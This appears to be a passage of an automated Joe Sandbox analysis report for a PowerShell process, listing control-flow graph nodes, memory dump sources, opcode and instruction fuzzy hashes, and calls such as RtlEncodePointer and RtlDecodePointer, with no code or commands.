7ffbabf7ac31-7ffbabf7ac3c 525->540 541 7ffbabf7ac5b-7ffbabf7ac9f 525->541 530 7ffbabf7ae3b-7ffbabf7ae74 526->530 531 7ffbabf7ae33-7ffbabf7ae39 526->531 527->526 564 7ffbabf7aeae-7ffbabf7aeb2 530->564 565 7ffbabf7ae76-7ffbabf7ae80 530->565 531->530 543 7ffbabf7afec-7ffbabf7b009 532->543 544 7ffbabf7af8b-7ffbabf7afa0 532->544 533->543 556 7ffbabf7aca0-7ffbabf7acc7 540->556 557 7ffbabf7ac3f-7ffbabf7ac54 540->557 541->556 554 7ffbabf7b00f-7ffbabf7b061 543->554 555 7ffbabf7b116-7ffbabf7b168 543->555 544->533 545->546 548 7ffbabf7ad3d-7ffbabf7ad5d 546->548 575 7ffbabf7ad64-7ffbabf7ad85 548->575 581 7ffbabf7b16e-7ffbabf7b196 555->581 582 7ffbabf7b1eb 555->582 556->513 557->541 569 7ffbabf7aecf-7ffbabf7aed3 564->569 570 7ffbabf7aeb4-7ffbabf7aec7 564->570 565->492 572 7ffbabf7ae86-7ffbabf7aeac 565->572 576 7ffbabf7af17-7ffbabf7af21 569->576 577 7ffbabf7aed5-7ffbabf7aedf 569->577 570->569 572->569 575->548 586 7ffbabf7ad87-7ffbabf7adb2 575->586 576->492 579 7ffbabf7af27-7ffbabf7af4f 576->579 577->492 585 7ffbabf7aee5-7ffbabf7af15 577->585 597 7ffbabf7af57-7ffbabf7af63 579->597 603 7ffbabf7b19c-7ffbabf7b1ba 581->603 604 7ffbabf7b269-7ffbabf7b27b 581->604 590 7ffbabf7b1f0-7ffbabf7b1f4 582->590 585->597 586->513 594 7ffbabf7b1f6-7ffbabf7b213 590->594 595 7ffbabf7b215-7ffbabf7b219 590->595 594->595 599 7ffbabf7b23d-7ffbabf7b256 595->599 600 7ffbabf7b21b-7ffbabf7b23b 595->600 611 7ffbabf7b28d-7ffbabf7b29f 597->611 619 7ffbabf7b25d-7ffbabf7b262 599->619 600->619 603->590 613 7ffbabf7b1bc-7ffbabf7b1e9 603->613 604->611 611->489 611->490 613->595 619->604
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: HJq
                  • API String ID: 0-3558344305
                  • Opcode ID: 8b32274a146dd135dd57c4ce42a293f33fa1a78dd684ee02bdd2a3d5e728acc5
                  • Instruction ID: 69569e1cd0cf662a45225973443f85e50d193c41e3324833aebe43b4c60999e7
                  • Opcode Fuzzy Hash: 8b32274a146dd135dd57c4ce42a293f33fa1a78dd684ee02bdd2a3d5e728acc5
                  • Instruction Fuzzy Hash: 2452A371A18A4D8FEB59EB68C4556BD77E2FF58300F1540BDD40ED32A6DE39A882CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1018 7ffbabf89fa1-7ffbabf89fad 1019 7ffbabf89faf 1018->1019 1020 7ffbabf89fb0-7ffbabf89fc1 1018->1020 1019->1020 1021 7ffbabf89fc3 1020->1021 1022 7ffbabf89fc4-7ffbabf8a00f 1020->1022 1021->1022 1025 7ffbabf8a02e-7ffbabf8a036 1022->1025 1026 7ffbabf8a011-7ffbabf8a01c 1022->1026 1028 7ffbabf8a038-7ffbabf8a069 RtlDecodePointer 1025->1028 1029 7ffbabf8a07c-7ffbabf8a093 1025->1029 1026->1025 1030 7ffbabf8a06b 1028->1030 1031 7ffbabf8a071-7ffbabf8a07a 1028->1031 1030->1031 1031->1029
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8b1bf7455b556e51257d020e69a383cbbf54dacba025272f419ac722c2df7b23
                  • Instruction ID: 58144e0462dfdd1f4b586b93f1b797d8d390f6b9fc0ab4222ec98c3e44a45c30
                  • Opcode Fuzzy Hash: 8b1bf7455b556e51257d020e69a383cbbf54dacba025272f419ac722c2df7b23
                  • Instruction Fuzzy Hash: 54316B7080DA8C5FDB5ADB7C9808BF57BE0EB96320F04817FD059C31A2DA651819C791
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1032 7ffbabf77145-7ffbabf7719f 1036 7ffbabf771a1-7ffbabf771ac 1032->1036 1037 7ffbabf771be-7ffbabf771c6 1032->1037 1036->1037 1039 7ffbabf7720c-7ffbabf77223 1037->1039 1040 7ffbabf771c8-7ffbabf771f9 RtlEncodePointer 1037->1040 1041 7ffbabf77201-7ffbabf7720a 1040->1041 1042 7ffbabf771fb 1040->1042 1041->1039 1042->1041
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d7852dfbb969156d93ab866de03e6c0821657c27c6991874fb30fae771e1ce6
                  • Instruction ID: 563db85ee8f7a75999514b3b1f41fd75d1ed00ef35a681674a3a674162cd5a97
                  • Opcode Fuzzy Hash: 3d7852dfbb969156d93ab866de03e6c0821657c27c6991874fb30fae771e1ce6
                  • Instruction Fuzzy Hash: 3731567190CA4C5FEB59DB28D8097F97BF0EB96320F0882AFD049C3163CB656856CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1049 7ffbabf8a020-7ffbabf8a036 1051 7ffbabf8a038-7ffbabf8a069 RtlDecodePointer 1049->1051 1052 7ffbabf8a07c-7ffbabf8a093 1049->1052 1053 7ffbabf8a06b 1051->1053 1054 7ffbabf8a071-7ffbabf8a07a 1051->1054 1053->1054 1054->1052
                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID: DecodePointer
                  • String ID:
                  • API String ID: 3527080286-0
                  • Opcode ID: 0f972d6729bf548fa769944d6085a6ea30d6fc935679e6d728f22c70155906ca
                  • Instruction ID: 7e414ddba09f2199664877fadd00c354189ebf17c812d5862f03bb3de602503d
                  • Opcode Fuzzy Hash: 0f972d6729bf548fa769944d6085a6ea30d6fc935679e6d728f22c70155906ca
                  • Instruction Fuzzy Hash: 1901B57150CA4C8EDB59EB6CD409BE477E0F799321F00822BC219C3551D7755059CBC0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1043 7ffbabf771b0-7ffbabf771c6 1045 7ffbabf7720c-7ffbabf77223 1043->1045 1046 7ffbabf771c8-7ffbabf771f9 RtlEncodePointer 1043->1046 1047 7ffbabf77201-7ffbabf7720a 1046->1047 1048 7ffbabf771fb 1046->1048 1047->1045 1048->1047
                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID: EncodePointer
                  • String ID:
                  • API String ID: 2118026453-0
                  • Opcode ID: e06df92eace4c760c119106f8245d414b16f926b0845264fbad8c30c8d38458a
                  • Instruction ID: 2fc7feed18c7cbb3b37cccdc1104f8d28b53229b5e68614924b4d82addabddc2
                  • Opcode Fuzzy Hash: e06df92eace4c760c119106f8245d414b16f926b0845264fbad8c30c8d38458a
                  • Instruction Fuzzy Hash: 4E01B17154CA0C8EEB59DB6CD0097E8BBF0F795331F00822ED819C3561D3B5A0A5CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.441913091.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbac040000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: gr
                  • API String ID: 0-2602249913
                  • Opcode ID: 0273a2c9d6c03be31df333ffb93261a4d8a7ba0de2c76563c55c6c09e21b4f69
                  • Instruction ID: 637b8cc99d2d0327db4a97824fe20a45ba2ab5d12a6ec8c1ea0482d1b2bf9ff5
                  • Opcode Fuzzy Hash: 0273a2c9d6c03be31df333ffb93261a4d8a7ba0de2c76563c55c6c09e21b4f69
                  • Instruction Fuzzy Hash: 234147E2A4EAC64FFBBAD7388C691766BD1EF65210B1800FAC849C71D3DE08DC198345
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.441913091.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbac040000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: gr
                  • API String ID: 0-2602249913
                  • Opcode ID: 64c117afeab66a667955eb9e613515238bd0056669ab5b00575836d94339e230
                  • Instruction ID: 5cf134faf3e77455d2077f03bc56e49fb504c9b6d35e18e881752c200bfe9c2e
                  • Opcode Fuzzy Hash: 64c117afeab66a667955eb9e613515238bd0056669ab5b00575836d94339e230
                  • Instruction Fuzzy Hash: 4621D3E2E4E6C74FFABAD7384C591766AD1EF65250B1800BAC44DC70D3EA189C198315
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.441913091.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbac040000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7e31705167a687bfd76528fa9c6d144a070a5984bedae5dd55e280cb81a40503
                  • Instruction ID: 31826ff3f792a4a523551e2eb5f9130eade87c8a199d3d95eb6f3c904bc14353
                  • Opcode Fuzzy Hash: 7e31705167a687bfd76528fa9c6d144a070a5984bedae5dd55e280cb81a40503
                  • Instruction Fuzzy Hash: 32D158B290EA894FEBB6D7A888595B67BE1EF55300F0800FAD44EC71D3DE18E816C751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.441913091.00007FFBAC040000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC040000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbac040000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c69d99761d7531492306c09fe03105b5bace7e31be9c46133eacf3a55d5d0c30
                  • Instruction ID: 8f95ba8011503283fb3e9c9e48b9f0e5f5ec5ae3033b942f448fdd555e94cd03
                  • Opcode Fuzzy Hash: c69d99761d7531492306c09fe03105b5bace7e31be9c46133eacf3a55d5d0c30
                  • Instruction Fuzzy Hash: 1D51C4F2A0EA8A4FEBF7D7A885691796BD1EF55200F0800F9C84EC71C7CE18D8158755
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: `_^$`_^$`_^$`_^
                  • API String ID: 0-4101248720
                  • Opcode ID: 2626584fd5f39a67c7f92f5beea95046f9ae167e1a4f284db063c86c11a8baed
                  • Instruction ID: 1671c5c7bb71b950615faa14dffa0ff26a8b0c17ff3cd971705daeda7fa62719
                  • Opcode Fuzzy Hash: 2626584fd5f39a67c7f92f5beea95046f9ae167e1a4f284db063c86c11a8baed
                  • Instruction Fuzzy Hash: 8231E297C0DAC64FD7534B7898690A33FA4AF53329B1D41F2C8D58B0A7EA061C09C7A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ddf4ba4b3c174f4178787f4d96749d9fafafceec19306b7a4a3b846341b04b4
                  • Instruction ID: 87a373b1950fbdc5ad27126704be3738e1450bd8f7e7517d839a8bb33b96ff30
                  • Opcode Fuzzy Hash: 7ddf4ba4b3c174f4178787f4d96749d9fafafceec19306b7a4a3b846341b04b4
                  • Instruction Fuzzy Hash: 80E1F567D5D3894FDB52DB7C94A50D23FA0EF47229B1802FBC4D2CA0A3DA15580AE3E5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4d2d562f7dad58a62b79d9b62111a85901cc6ef09b7dfccbc4078a0ff9e8ccd9
                  • Instruction ID: 7ab5a16e82a6be9a6438c7d375ccd8f3355fe8b3e51812c85a1dbe46d00bb2d5
                  • Opcode Fuzzy Hash: 4d2d562f7dad58a62b79d9b62111a85901cc6ef09b7dfccbc4078a0ff9e8ccd9
                  • Instruction Fuzzy Hash: 1151A06B95E3C94FD363CAB8A8A60D6BF70EE5313572901F7C4818F0A79510295DE3B2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000002.00000002.441621597.00007FFBABF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBABF70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffbabf70000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d1c055eabaf543bd14c8f46a06a21983782a6d9a857d5fbcbb3e384079cc045e
                  • Instruction ID: 100ac20200941e1e1270e344bad916951acc3ad9d6685b15f9063f1df6e8bb00
                  • Opcode Fuzzy Hash: d1c055eabaf543bd14c8f46a06a21983782a6d9a857d5fbcbb3e384079cc045e
                  • Instruction Fuzzy Hash: 8C51A26B95E3CA4FD363CEB8A4A50D6BF70EE5313532902F7C4918E0A79510255DE3B2
                  Uniqueness

                  Uniqueness Score: -1.00%